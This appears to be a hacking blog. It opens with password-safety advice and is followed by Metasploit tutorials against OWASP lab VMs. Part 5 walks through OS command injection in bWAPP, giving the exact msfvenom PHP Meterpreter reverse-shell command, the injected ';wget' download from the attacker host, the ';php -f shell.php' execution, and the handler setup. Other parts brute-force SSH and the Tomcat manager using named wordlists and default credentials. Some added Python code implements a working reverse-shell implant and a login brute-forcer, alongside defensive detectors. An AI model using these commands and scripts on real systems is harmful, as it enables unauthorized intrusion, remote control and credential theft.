Hacking Castle

Friday, October 16, 2020

How To Save Yourself from Hackers (For Everyone)

As technology advances it is put to good use selling goods and services and improving websites, but it is also used by criminals to take websites and businesses offline and to steal passwords.

With the number of reported website hacks and malware attacks rising, the harm done through technology keeps rising with it. System hacking is one of the most common problems today.

Cyber Security Threats


That is why security has become a concern that can no longer be put off: the Internet is now used by people from all walks of life. Whether a business is large or small, it should give proper attention to protecting its network and software against attackers.

It is vitally important that every system operator or administrator uses a distinct password that cannot be guessed, whether by a casual vandal or by a professional attacker, and that they stay vigilant before an attack happens rather than after.

Someone who breaks into software and networks usually does it for money, or simply for the challenge. To avoid incidents such as stolen passwords you should take precautions, not only for your systems but for your own safety as well.

A strong password is therefore a must for the privacy and security of your website and the data it stores. It is the user's responsibility to make the password as unique as possible, so that it is hard to guess and hard for anyone, or any program, to discover.


To keep your password from being guessed or cracked, consider the following points when creating one.

Creating a strong password


1. Build the password from material that has nothing to do with you. Do not embed real details such as credit card or bank account numbers in it; a password is a secret, not a place to store other secrets.


2. Use a mix of letters, numbers and symbols, with some of the letters in uppercase. Mixing character classes only helps if the password is also long.


3. The password should be hard to guess, so that neither a person nor a cracking program can discover it quickly.


4. It should not be an existing word or name, in any language. Cracking tools try every dictionary, not only the English one.


5. Do not use your initials, your date of birth or other common words; these are the first things anyone guessing will try.


6. Do not reuse a password from another or an older account. One leaked database then unlocks every account that shared it.


7. Make the password long. A five-character password falls to a brute-force attack in seconds; use at least twelve characters, and prefer a longer passphrase.


8. Do not use the usual passwords ("password", "123456", "qwerty"); they sit at the top of every wordlist.


9. If you have two or more email accounts, give each one its own password.


10. Last but not least, keep your usernames and passwords organised so that you can find them when you need them, but not in a plain notes file, spreadsheet or document: anyone who reaches that file gets every account at once. A password manager does the same job and keeps the list encrypted.
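Tips 2 to 8 can be checked mechanically, and the organising in tip 10 is easier when the password is generated rather than invented. The following is an added example, not part of the original article: a checker that applies those rules and a generator that draws from the operating system's secure random source. The common-password list and the personal tokens are constructed placeholders; a real check would use a breach list such as a Have I Been Pwned download.

```python
import re
import secrets
import string

# Constructed stand-in for a breach list; a real deployment would use a full one.
COMMON_PASSWORDS = {"password", "123456", "qwerty", "letmein", "admin", "welcome"}


def check_password(password, personal_tokens=(), min_length=12):
    """Return the list of rules the password breaks (empty list means it passes).

    personal_tokens: strings tied to the user (name, birth year, initials)
    that must not appear anywhere in the password (tip 5)."""
    problems = []
    if len(password) < min_length:                      # tip 7: length
        problems.append(f"shorter than {min_length} characters")
    classes = [                                          # tip 2: character mix
        any(c.islower() for c in password),
        any(c.isupper() for c in password),
        any(c.isdigit() for c in password),
        any(c in string.punctuation for c in password),
    ]
    if sum(classes) < 3:
        problems.append("uses fewer than three character classes")
    lowered = password.lower()
    if lowered in COMMON_PASSWORDS:                     # tip 8: usual passwords
        problems.append("is a common password")
    for token in personal_tokens:                        # tip 5: personal data
        if token and token.lower() in lowered:
            problems.append(f"contains personal information '{token}'")
    if re.search(r"(.)\1{3,}", password):               # aaaa, 1111 and the like
        problems.append("repeats one character four or more times")
    return problems


def generate_password(length=16):
    """Generate a random password that passes check_password().

    secrets.choice() uses the OS CSPRNG; random.choice() would be guessable."""
    alphabet = string.ascii_letters + string.digits + string.punctuation
    while True:
        candidate = "".join(secrets.choice(alphabet) for _ in range(length))
        if not check_password(candidate, min_length=length):
            return candidate


if __name__ == "__main__":
    print(check_password("John1990xyz!", personal_tokens=["John", "1990"]))
    print(generate_password(20))
```

The generator loops until a candidate passes the same checker, so the two functions cannot drift apart: whatever policy you tighten in check_password() is automatically what generate_password() produces.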


After choosing a strong password for your account, you should also consider how to secure your website against opportunistic attacks and determined attackers. The following are the pointers to consider:

Protect Yourself



1. Install antivirus protection on the computers you manage the website from. It is one layer of defence, not a complete safeguard, so do not rely on it alone.


2. Change a password immediately if you suspect it has been exposed, and pick a new alphanumeric one rather than a variation of the old one. Keep track of every username and password you create in a password manager so that a change does not lock you out.


3. Keep applying security patches to your systems and software, so that malware such as trojans cannot get in through known holes.


4. Register the site with Google Search Console (formerly Google Webmaster Tools), which warns you when Google detects that your site has been hacked or is serving malware.


5. Lastly, always keep backups so that you can restore the data you saved, and test that a restore actually works.


After reading this article, follow these tips so that you are ready for, and alert to, any hacking attempt.

It is up to you whether you follow them, but they close the easiest doors into your software, your network and the website you have invested in.

If staying away from password thieves is your top priority, keep the simple tips above in mind and act on them.


Saturday, October 3, 2020

Complete Metasploit Guide (Part-5 OS Command Injection)


Let us get started with our first real exploitation. Open msfconsole, and open the OWASP virtual machine as well; mine is already up and running. Then open Firefox. In this tutorial I will show you how to get a Meterpreter shell back through an OS command injection.

I will also show you how to do the same thing through a PHP code injection. We did not cover PHP code injection separately, but it is almost the same as the other injections we did before: user input reaches the page without proper filtering and is interpreted as code instead of data.

First, go to the OWASP virtual machine in the browser. My IP is 192.168.56.11, and it opens the standard OWASP welcome page, which lists everything we need. Go to bWAPP. The login is the same as before, bee with password bug. Press Enter, and you are logged into bWAPP. Then choose OS Command Injection from the list of bugs.



We will use Burp Suite together with Metasploit and the OWASP virtual machine. Burp lets us inspect the requests, and we will be sending things such as our Meterpreter shell and other commands to the website through it.

Before any of that, go to Proxy, Intercept, and turn intercept off so the pages load normally. Reload the page and it connects fine; we are on the OS command injection page.

The page performs a DNS lookup on whatever target you type. Run it with the default target first: the output shows the DNS server and its IP address (your router here), followed by the answer for the target, which does not matter to us. What matters is what happens when we append a second command to the target, separated by a semicolon: `; ls`, which lists the files and directories in the current directory. Click Lookup, and just like that we can see that the website is vulnerable to command injection: the server ran our ls as well.

[Image: bWAPP OS command injection output]


It listed all of the files in that directory on the server, which it should never do. Now that we know the input reaches a shell, the next step is to make a Meterpreter shell that runs as PHP.
Why PHP?
As we can see, all of the files on the server are .php, so the web server already runs PHP. We can drop our shell on it, run it, and make the web server connect back to our machine. So let us start by creating the PHP Meterpreter shell.
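What the bWAPP page is doing wrong, in miniature. The following is an added example, not bWAPP's PHP or anything from the original post: a lookup handler written the vulnerable way (user input pasted into a shell command line) beside a hardened one (validate the hostname, then pass the arguments as a list so no shell ever parses them). `echo nslookup` stands in for the real nslookup so the example runs offline without DNS; the hostname regex and the function names are my own.

```python
import re
import subprocess

# RFC 1123 hostname syntax: dot-separated labels of letters, digits and hyphens.
# Anything else (spaces, ';', '|', '$', backticks) is rejected up front.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)*"
    r"[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?$",
    re.IGNORECASE,
)


def is_valid_target(target):
    return bool(HOSTNAME_RE.match(target))


def vulnerable_lookup(target):
    """The bWAPP pattern: string concatenation into a command the shell parses.
    The shell sees ';' as a command separator, so 'host; cmd' runs cmd too."""
    cmd = "echo nslookup " + target          # 'echo' stands in for nslookup
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def argv_only_lookup(target):
    """Step one of the fix: argv as a list, no shell. ';' is now just a character
    in one argument, so nothing extra runs even without validation."""
    return subprocess.run(["echo", "nslookup", target],
                          capture_output=True, text=True).stdout


def hardened_lookup(target):
    """Step two: reject anything that is not a hostname before it goes anywhere."""
    if not is_valid_target(target):
        raise ValueError(f"rejected target: {target!r}")
    return argv_only_lookup(target)


if __name__ == "__main__":
    payload = "www.example.com; echo INJECTED"
    print(vulnerable_lookup(payload))    # second line: INJECTED
    print(argv_only_lookup(payload))     # one line, the ';' is inert
    print(is_valid_target(payload))      # False
```

Both halves of the fix matter: the argv list stops the shell from interpreting metacharacters, and the allow-list stops the lookup tool itself from being handed options or paths it should never see.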

This is where we introduce msfvenom for the first time, the tool we will use to create the Meterpreter shell. Leave the browser for now and open a new terminal.

msfvenom

If you want, type msfvenom --help first; it prints the available options, but let's not bother with them now. Follow what I type and I will explain as I go.

#msfvenom -p php/meterpreter/reverse_tcp LHOST=10.0.2.15 LPORT=4444 -e php/base64 -f raw > shell.php

So: msfvenom, then -p, which specifies the payload. We want the PHP Meterpreter over a reverse TCP connection, so the payload is php/meterpreter/reverse_tcp.

[Image: reverse TCP shell diagram]

I made a simple illustration of what a reverse TCP shell means. On one side is the attacker's PC, our good old Kali Linux machine. On the other is the victim machine we are attacking, in our case the OWASP virtual machine. We want to get the shell onto the victim machine.

The problem with simply connecting to an open port on the victim is that there is usually a firewall in front of it; nearly every network has one nowadays. What a firewall usually does not block is the victim machine connecting out to us, because most firewalls filter inbound connections strictly and outbound connections loosely. A network with strict egress filtering can still block a reverse shell, which is why in practice LPORT is often set to 443 or 80 so the callback looks like ordinary web traffic.

Now how will we do that?

We send a file, shell.php, to the victim machine, and that file initiates the connection to us. When it is run on the victim, it tries to connect to our machine. The firewall does not stop it, because the connection starts from the inside. Meanwhile we are listening for incoming connections, so once the program starts it connects back, and we can execute commands on that machine and so on.

But you might be asking how we are going to get that file onto the victim machine.

That is simple. If the victim machine is vulnerable to PHP code injection or OS command injection, we can make it download the file through the injection itself.

But if the machine has no such vulnerability, which we will cover in later articles, the only way for the victim to get the file is to click a download link and run it themselves; we cannot run the file for them. Or there is another way: if the victim is physically close to you, you can copy the file onto a USB drive, transfer it to the victim machine while they are not looking, and run it. Then you have done the whole process yourself, by being physically at their laptop or PC.

I hope this makes sense. The basic idea is that the victim connects back to us by running our malware, the PHP Meterpreter shell.
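The connect-back described above, as an added example in Python; this is not Meterpreter and not code from the original post. The listener plays the role exploit/multi/handler plays later in this tutorial, and the "implant" plays shell.php, except that here it runs in a thread on the same machine (127.0.0.1) and speaks a one-line-JSON protocol I made up for the demo rather than Meterpreter's own wire format.

```python
import json
import socket
import subprocess
import threading

# Demo wire format (an assumption, not Meterpreter's protocol): the listener
# sends one JSON array (an argv list) per line; the implant answers with one
# JSON string (the command's stdout) per line. ["exit"] ends the session.


def start_listener(host="127.0.0.1", port=0):
    """Attacker side: bind and wait. port=0 lets the OS pick a free port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, port))
    srv.listen(1)
    srv.settimeout(10)                     # do not hang forever if nobody calls back
    return srv, srv.getsockname()[1]


def implant(lhost, lport):
    """Victim side. Note the direction: the victim dials OUT to LHOST:LPORT,
    which is why an inbound-only firewall never sees a blocked packet."""
    with socket.create_connection((lhost, lport), timeout=10) as sock:
        reader = sock.makefile("rb")
        for line in reader:
            argv = json.loads(line)
            if argv == ["exit"]:
                break
            proc = subprocess.run(argv, capture_output=True, text=True)
            sock.sendall(json.dumps(proc.stdout).encode() + b"\n")


def run_session(commands, host="127.0.0.1"):
    """Start the listener, launch the 'victim' in a thread, accept the
    connect-back and run each argv list through it. Returns the peer
    address seen by the listener and the list of outputs."""
    srv, port = start_listener(host)
    victim = threading.Thread(target=implant, args=(host, port), daemon=True)
    victim.start()
    conn, peer = srv.accept()              # blocks until the victim connects back
    outputs = []
    with conn:
        reader = conn.makefile("rb")
        for argv in commands:
            conn.sendall(json.dumps(argv).encode() + b"\n")
            outputs.append(json.loads(reader.readline()))
        conn.sendall(json.dumps(["exit"]).encode() + b"\n")
    victim.join(timeout=10)
    srv.close()
    return peer[0], outputs


if __name__ == "__main__":
    print(run_session([["echo", "hello from the victim"], ["id"]]))
```

The only thing the "victim" needs is an outbound TCP connection to the listener; everything after that rides on a channel the victim opened, which is exactly the property the firewall discussion above depends on.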

Let us continue with making it. The payload is Meterpreter, in PHP, over a reverse TCP connection. There are other options, but these are the ones we use for now.

Next we specify LHOST, the local host IP address. That is the IP address of the host that is listening, which in this case is you, the attacker. So after LHOST, an equals sign, then the IP address. Check yours with ifconfig; mine is 10.0.2.15.

After that we specify LPORT, the port you are listening on, also on your machine. Metasploit defaults to 4444, so we keep that. The remaining options are optional.

I will set one anyway to show you. Let's use an encoder; I covered what an encoder is in the previous article. Encoders are mostly used in the hope of bypassing antivirus, which we do not need here, but I will show you how to use one. The encoder scrambles the code so it is no longer readable in raw form. Note that the one I use, php/base64, is an encoding, not encryption: anyone can decode it, and antivirus and web application firewalls recognise the eval(base64_decode(...)) pattern on sight, so do not count on it for evasion.

Finally we specify -f raw for the output format, and redirect the output into shell.php. Double-check all of the options, press Enter, and it takes a few seconds to finish.

Our Meterpreter PHP shell is 1503 bytes. Run ls and you will see it: shell.php is our malware, the program we will send to the victim machine, created with that one command. There are a couple of things to do when you make a PHP reverse shell this way.

First, add the PHP tags, because the encoded output does not include them. Open the file and you see the scrambled, Base64-encoded code and the function that decodes it; it does not look like a program at all, which is what the encoder is for. Add the opening tag <?php at the top and the closing tag ?> at the end, so that the PHP interpreter recognises the file as PHP code. In nano, Ctrl+O saves and Ctrl+X exits.




Now we are good to go. The only thing left is to put the file somewhere it can be downloaded from, and that place is the Apache web server bundled with XAMPP. The document root of XAMPP is /opt/lampp/htdocs/, so move shell.php from wherever you created it into that directory. I made a folder named shell, so my path is /opt/lampp/htdocs/shell/shell.php, and the file is there.

Next, make sure XAMPP is running; it shows as active. Then browse to localhost/shell,


and we can see that shell.php is available online. Now we want to make the victim PC download it. Since it is vulnerable to command injection, we use a simple tool that exists on practically every Linux system: wget, which downloads a file from a URL. Let's test it locally first: go to root, mkdir test, cd test. The folder is empty. Now run wget against localhost with the path of our file, /shell/shell.php, relative to the XAMPP document root.
Which looks like this,

wget localhost/shell/shell.php

Press Enter and it downloads the file for us. Run ls again and shell.php is in the folder; cat it and the whole file is there. That confirms the web server on Kali serves the file correctly. Now let us continue with the attack and perform the command injection.

We know there is a vulnerable input, so let's exploit it.
Type the same wget command into the DNS lookup field, after a semicolon. One thing changes: localhost inside the injected command resolves on the victim, not on Kali, so you must use the address the victim can reach your web server on, which is the same address we set as LHOST:

;wget 10.0.2.15/shell/shell.php

Click Lookup. The lookup output will not show the download itself, so check that the file arrived, for example by injecting ;ls again: shell.php is now on the target machine, fetched with one simple command, without anyone clicking anything and without any physical contact with that machine. To execute it we need one more command, but before that we need to start listening on our port.

Open msfconsole so we can continue. Before we execute shell.php on the victim, we start our listener in the Metasploit framework. What we use for that is exploit/multi/handler.

This is something you will use a lot. Just type
use exploit/multi/handler

[Image: msfconsole, exploit/multi/handler]


show options shows no payload-specific options yet, so set the payload,
set payload php/meterpreter/reverse_tcp

and now LHOST and LPORT appear. These must match what we used in msfvenom when making shell.php: LPORT 4444, and LHOST the IP address of our own machine, since we are listening for a connection to ourselves. So set LHOST 10.0.2.15

[Image: multi/handler payload options]


Then type exploit (run does the same), and the handler waits for an incoming connection. We are now waiting for someone to run that program on the target machine. Nobody is going to, so we do it ourselves, through the command injection: a semicolon, then php -f shell.php, which runs the PHP file.

;php -f shell.php

Click Lookup, and in msfconsole we get "Meterpreter session 1 opened". It shows a connection from the OWASP virtual machine's IP address to our Kali Linux machine's IP address. We have Meterpreter. That will be it for this tutorial. We will cover the other exploits as well, and what we can do once a Meterpreter session is open: what we can execute, which post-exploitation modules we can use, and so on. I hope I see you in the next tutorial. Take care, bye!

Wednesday, July 15, 2020

Complete Metasploit Guide (part-4 Bruteforcing Tomcat with msf Auxiliary)

Hello everybody and welcome back. Let us perform another scan, and another attack, on our OWASP virtual machine. Start the Metasploit framework console. We will run Nmap once more against the OWASP virtual machine to see the available services.

We will attack the Tomcat server. First run Nmap; 192.168.56.101 is my OWASP IP address.

[Image: Nmap scan run from msfconsole]


We will attack the Apache Tomcat running on port 8080. There is an auxiliary module in the Metasploit framework that can be used against it. Here it is in the scan: port 8080/tcp, Apache Tomcat. What we will do is brute-force the Tomcat manager login.

Let us search for tomcat and see what exploits and auxiliary modules are available. Right now we are only interested in the auxiliary ones.
so type

search tomcat

[Image: search tomcat results]


What we want to use is

auxiliary/scanner/http/tomcat_mgr_login

the Tomcat Application Manager Login Utility. This one has no disclosure date listed and is ranked normal. If you do not want to copy the module path you can type it with tab completion: auxiliary, Tab, scanner, Tab, http, Tab, tomcat_mgr_login.

use auxiliary/scanner/http/tomcat_mgr_login

Once you press Enter, check it with show options.

[Image: tomcat_mgr_login options]


These are the available options. This module has quite a few more than the previous ones, so let us see what we can do with them.

BLANK_PASSWORDS is false; true would also try an empty password for every user.
BRUTEFORCE_SPEED we leave at 5, which is the maximum.
THREADS can be raised so it runs faster.
DB_ALL_CREDS, DB_ALL_PASS and DB_ALL_USERS are not required and we will not set them; they pull credentials out of the Metasploit database. PASSWORD we do not need either, since we want to use a password list and a username list.
By default this module already has wordlists set: USER_FILE is /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt and PASS_FILE is tomcat_mgr_default_pass.txt in the same directory, one entry per line.
So the credentials are split into a user list and a password list. We stick with the defaults, since they contain the well-known Tomcat default usernames and passwords.
PROXIES we do not need.
What we do need, and will always need, is RHOSTS, the target's IP address: set RHOSTS 192.168.56.101 and press Enter.
RPORT is 8080 unless Tomcat runs on another port; our Nmap scan of the OWASP virtual machine showed it really is 8080, so leave it. It is also required. These two are always required; you cannot run the scan without them.
SSL is not required.
STOP_ON_SUCCESS.
We set it to true, since there is no need to continue brute-forcing after we find a working username and password. So: set STOP_ON_SUCCESS true

TARGETURI is /manager/html, which is the right path, but let's check. In the browser this is the path of the Tomcat manager login page: go to 192.168.56.101, specify the port since Tomcat runs on 8080, then /manager/html.

[Image: Tomcat manager login prompt]


Yes, it prompts us for a username and password; that prompt is what we are brute-forcing. Once we have the username and password we can change the settings of the Tomcat web server. Close it for now; we got a 401 Unauthorized since we did not give a username and password. That is about to change, hopefully, once we find the correct pair.
VERBOSE is set to true, so every attempt is printed.
Everything is set.

[Image: tomcat_mgr_login options, all set]


Now type run, or exploit; both work here. Press Enter.

[Image: tomcat_mgr_login brute-force output]


It goes fast, faster than I expected, and we found the username and password: the line with the plus sign says login successful, root:owaspbwa. root is the username and owaspbwa is the password. It went by too quickly, so I ran it once more to show it.
Now let's use this username and password to log in to the web server. Reload the page, enter root as the username and owaspbwa as the password, press OK, and we are logged into the Tomcat Web Application Manager, where we can change all of these settings if we want to. This should never be reachable by an ordinary user of the website. That is it for this attack; we covered the Tomcat auxiliary module.

[Image: Tomcat Web Application Manager after login]


We used scanner/http/tomcat_mgr_login to brute-force Tomcat on port 8080, and it worked. That would be it for this tutorial. In the next ones we start with the exploit modules and try some more advanced things, such as PHP injection and command injection, to get a Meterpreter shell back. I hope I see you in the next one.
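What tomcat_mgr_login does under the hood, and the same guess-and-stop loop that ssh_login runs in Part 3 with SSH instead of HTTP as the transport. This is an added example, not module code or anything from the original post: it starts a constructed stand-in for the Tomcat manager on 127.0.0.1 that accepts only root:owaspbwa behind HTTP Basic authentication, then guesses credentials against it exactly as STOP_ON_SUCCESS=true would. The stub server, the credential lists and the URL are assumptions for the demo.

```python
import base64
import http.server
import threading
import urllib.error
import urllib.request

# Constructed stand-in for the Tomcat manager: one valid credential pair.
VALID_USER, VALID_PASS = "root", "owaspbwa"
MANAGER_PATH = "/manager/html"


class FakeManager(http.server.BaseHTTPRequestHandler):
    """Answers 401 with a Basic challenge until the right Authorization arrives."""

    def do_GET(self):
        expected = "Basic " + base64.b64encode(
            f"{VALID_USER}:{VALID_PASS}".encode()).decode()
        if self.path == MANAGER_PATH and self.headers.get("Authorization") == expected:
            self.send_response(200)
            self.end_headers()
            self.wfile.write(b"Tomcat Web Application Manager")
        else:
            self.send_response(401)
            self.send_header("WWW-Authenticate", 'Basic realm="Tomcat Manager Application"')
            self.end_headers()

    def log_message(self, *args):      # keep the server quiet
        pass


def start_fake_manager():
    """Serve the stub on a free localhost port in a background thread."""
    srv = http.server.HTTPServer(("127.0.0.1", 0), FakeManager)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, srv.server_address[1]


# Ignore any http_proxy in the environment so the request really hits localhost.
OPENER = urllib.request.build_opener(urllib.request.ProxyHandler({}))


def try_login(url, user, password):
    """One attempt: Basic auth is just base64(user:password). 200 = success, 401 = fail."""
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    req = urllib.request.Request(url, headers={"Authorization": "Basic " + token})
    try:
        with OPENER.open(req, timeout=5) as resp:
            return resp.status == 200
    except urllib.error.HTTPError as err:
        if err.code == 401:
            return False
        raise


def guess_manager_login(url, users, passwords, stop_on_success=True):
    """Try every user/password pair; return the pairs found and attempts made."""
    found, attempts = [], 0
    for user in users:
        for password in passwords:
            attempts += 1
            if try_login(url, user, password):
                found.append((user, password))
                if stop_on_success:
                    return found, attempts
    return found, attempts


if __name__ == "__main__":
    server, port = start_fake_manager()
    target = f"http://127.0.0.1:{port}{MANAGER_PATH}"
    print(guess_manager_login(target, ["admin", "tomcat", "root"],
                              ["admin", "tomcat", "owaspbwa"]))
    server.shutdown()
```

Against a real Tomcat, remember that the LockOutRealm shipped with modern versions locks an account after a handful of failures within a few minutes, so a fast run with many passwords per user can lock out the very account you are trying to find. The same burst of 401 responses for /manager/html from one source address is what a defender should be alerting on in the access log.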

Happy hacking!

Tuesday, July 14, 2020

Complete Metasploit Guide (part-3 Bruteforcing SSH with Auxiliary)

Bruteforcing an SSH login with a Metasploit auxiliary module


Right now we want to start with some of the auxiliary modules in the Metasploit framework and scan the machine from msfconsole. First, start msfconsole. If you started PostgreSQL before this, msfconsole starts and searches faster.

While it starts, I also want to start my OWASP virtual machine. If you have Metasploitable 1 or Metasploitable 2 instead, you can use that.

I am using OWASP and will show you some of the attacks you can perform on the OWASP Broken Web Applications VM; some of them work the same way on Metasploitable. Start either of the two machines. The VM prompts for a username and password: the username is root and the password is owaspbwa.

We get the standard command line. First check the VM's IP address so we know it; the IP address of my OWASP virtual machine is 192.168.56.101. You can run almost every command from your regular terminal inside the Metasploit framework console as well.

First, let's take a good scan of the OWASP virtual machine. We covered Nmap before, so run
nmap -sV 192.168.56.101
-sV gets the versions of the services running on the open ports, and after it we give the IP address of the OWASP virtual machine, or of your Metasploitable machine if you use that. Execute it and wait for it to finish; it lists all of the open ports.


[Image: nmap -sV output inside msfconsole]


It lists the services running on the open ports and their versions, which is especially useful with the Metasploit framework, since the module you pick depends on the version. We will try some attacks on these. The scan finished in 33.9 seconds.
Let's start with the SSH port. There are other ports here too, such as 139 and 445 running Samba smbd 3.X - 4.X, which is also vulnerable software; Metasploitable has the same version, I believe, and I will show you how to exploit it later. For now, let us try to get in over SSH.

The service on port 22 is SSH, version OpenSSH 5.3p1 Debian 3ubuntu4. We will use an auxiliary module from the Metasploit framework and try to brute-force SSH on port 22 of our OWASP virtual machine, or of your Metasploitable; the process is the same. So let us search for ssh:

search ssh


[Image: search ssh results]


This prints every available module for SSH: exploits, auxiliary modules and post modules. What we are looking for is a scanner, specifically the login scanner. Here it is:
auxiliary/scanner/ssh/ssh_login.
It has no disclosure date, is ranked normal, and is described as the SSH Login Check Scanner, which is the SSH brute-forcer. You can also check the SSH version before you start that, with auxiliary/scanner/ssh/ssh_version, the SSH Version Scanner.

Let's start with that one. It gives us the same thing Nmap gave us, the SSH version, but you can use it instead of Nmap when Nmap does not return a version, and it is more detailed.

As we saw in the previous article, to pick any module you type use and then the module name. Then show options. There are four options and all are required, but most are already set. RPORT is 22, which is fine: SSH almost always runs on port 22, which is its default, and if it does not, change this.

THREADS is the number of threads running during the scan; more threads make it faster, so depending on the power of your virtual machine you can raise it. We also covered the set command: you set any of these options with set, the option name, and the value.

[Image: ssh_version options]

The only thing we need to set is RHOSTS, the target address, which is the IP address of our OWASP virtual machine: set RHOSTS 192.168.56.101. Show options again to check that everything is good, then type run. It prints the SSH version running on the target's port 22, plus other details about the server that can be useful later.



That was a simple scan. Now let's actually try to brute-force SSH on port 22. Go back to the auxiliary modules and use the login one:
auxiliary/scanner/ssh/ssh_login
Copy it, paste it after use, and the prompt shows the module has changed. Show options. Unlike the last one, this module has a lot of options to go through.

[Image: ssh_login options]


Now some of them are required and some of them are not. 
For example, BLANK_PASSWORDS are not required. The next things we need, these are all not required. 
Password to authenticate with, no. Well basically you would use this if you already knew the password side, you see the point of this option right here. 
What we do want is the RHOSTS, the same as in the previous scan. So just type your set RHOSTS and then the IP address of our target machine. So 192.168.56.101,. 
And also what you would want to set, basically let's set threads to be 3 So 
set THREADS 3
 RPORT is correct and it is 22, 
stop on success false, stop guessing when a credential works for a host. So you want to set this to true since there is no real point in continuing the brute force, unless you want to on multiple accounts after you find hosts that actually work. So on credentials that are useful. So we type in 
set STOP_ON_SUCCESS true
 so you can just press tab in order for it to fill the rest of the name, and you can set this from false to true. And we can see that stop on success is now set to true for both. 
You also want to set to true so you can see all of the attempts that they're running. Now you do not need to, basically, I always set it to true so I can see the attempts of a brute force that we covered already. 
Now we should have all of our options set and ready to go, except that we still need a password list, since this module has none pre-specified.
So let us find a simple password list. Open a second terminal (a new window); we know there are some wordlists in /usr/share/wordlists.
We won't use something like rockyou.txt; it would take forever. Those large lists are the best choice for Wi-Fi cracking, but for brute forcing a login they are not a good choice, since online guessing is nowhere near as fast as Wi-Fi cracking.
If you don't have these wordlists in the /usr/share folder, simply get them with the command

apt install wordlists

Now go into the metasploit subdirectory and type ls, and you will see some of the password lists that ship with Metasploit.
We do not really need to crack this SSH server; we just need to show you the process, so we can choose any password list we want. Let's say we choose this one:
mirai_user_pass.txt
What that name means, I believe, is that it holds both usernames and passwords. Yes, it has both, separated by a space. So we will use that, and the matching option for it is USERPASS_FILE, described as a file containing users and passwords separated by a space, one pair per line, which is exactly what we selected.
So we set that option, followed by the path to the wordlist:
set USERPASS_FILE /usr/share/wordlists/metasploit/mirai_user_pass.txt
That sets the path to our brute force list, or really our username and password list. If we show options once again, we should now be good to go.

Metasploit framework SSH login option


So let us run it. Type run and it should start brute forcing SSH on port 22. As we can see it is trying the different usernames and passwords, going through the list we specified. These are all failed attempts; when it reaches a pair that actually exists it will stop and report a success. Here we can see root:admin, admin:admin, root:root, and some of the other pairs.
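From the defender's side, a run like the one above leaves a very recognizable trail in the target's sshd log: a burst of failed logins from one address, several different usernames, and (with STOP_ON_SUCCESS) a success right after the run of failures. The following Python script is an added example, not part of this tutorial or of Metasploit. It parses a constructed auth.log excerpt (the lab address 192.168.56.1 is assumed to be the attacking box, and the year, which syslog omits, is assumed to be 2020) and flags sources that cross a failure threshold or succeed straight after a run of failures, which is essentially what fail2ban or a SIEM correlation rule does.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample of OpenSSH auth.log lines (not a real capture).
# 192.168.56.1 plays the Kali box running ssh_login; 192.168.56.20 is a
# legitimate admin who mistypes a password once.
SAMPLE_LOG = """\
Oct 16 10:01:01 owasp sshd[2101]: Failed password for invalid user msfadmin from 192.168.56.1 port 50110 ssh2
Oct 16 10:01:02 owasp sshd[2103]: Failed password for root from 192.168.56.1 port 50112 ssh2
Oct 16 10:01:02 owasp sshd[2105]: Failed password for admin from 192.168.56.1 port 50114 ssh2
Oct 16 10:01:03 owasp sshd[2107]: Failed password for root from 192.168.56.1 port 50116 ssh2
Oct 16 10:01:03 owasp sshd[2109]: Failed password for invalid user guest from 192.168.56.1 port 50118 ssh2
Oct 16 10:01:04 owasp sshd[2111]: Accepted password for root from 192.168.56.1 port 50120 ssh2
Oct 16 10:05:00 owasp sshd[2150]: Accepted publickey for alice from 192.168.56.20 port 40001 ssh2
Oct 16 10:06:30 owasp sshd[2160]: Failed password for alice from 192.168.56.20 port 40003 ssh2
Oct 16 10:06:40 owasp sshd[2162]: Accepted password for alice from 192.168.56.20 port 40005 ssh2
"""

# Matches the "Failed/Accepted <method> for [invalid user] <user> from <ip>" lines.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>\w+) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>[\d.]+) port \d+"
)


def parse_events(text, year=2020):
    """Turn raw sshd lines into auth events; lines that are not auth results are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        # syslog timestamps carry no year; the caller supplies it (assumed 2020 here)
        ts = datetime.strptime(f"{year} {' '.join(m['ts'].split())}", "%Y %b %d %H:%M:%S")
        events.append({"time": ts, "ok": m["result"] == "Accepted",
                       "method": m["method"], "user": m["user"], "ip": m["ip"]})
    return events


def detect_bruteforce(events, threshold=5, window_seconds=60):
    """Return {ip: summary} for sources that reach `threshold` failures inside any
    `window_seconds` window, or that log in right after such a run of failures."""
    by_ip = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["time"]):
        by_ip[ev["ip"]].append(ev)

    alerts = {}
    for ip, evs in by_ip.items():
        fails = [e for e in evs if not e["ok"]]
        # Sliding window over the failure timestamps: peak failures in any window.
        peak, start = 0, 0
        for end in range(len(fails)):
            while (fails[end]["time"] - fails[start]["time"]).total_seconds() > window_seconds:
                start += 1
            peak = max(peak, end - start + 1)
        # A success preceded by a run of failures from the same source is the
        # STOP_ON_SUCCESS footprint: the guesser found a working credential.
        compromised = None
        for i, e in enumerate(evs):
            if not e["ok"]:
                continue
            recent = sum(1 for p in evs[:i]
                         if not p["ok"] and (e["time"] - p["time"]).total_seconds() <= window_seconds)
            if recent >= threshold:
                compromised = e["user"]
        if peak >= threshold or compromised:
            alerts[ip] = {"failures_in_window": peak,
                          "distinct_users": sorted({e["user"] for e in fails}),
                          "compromised_user": compromised}
    return alerts


if __name__ == "__main__":
    for ip, info in detect_bruteforce(parse_events(SAMPLE_LOG)).items():
        print(ip, info)
```

Run it as a script to print the alerts. Tune threshold and window_seconds to the log volume you expect (one mistyped password, as in the alice lines, should never trip it), and treat a compromised_user hit as an incident to investigate, not just an address to block.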


Metasploit framework SSH login bruteforce



Metasploit framework SSH login


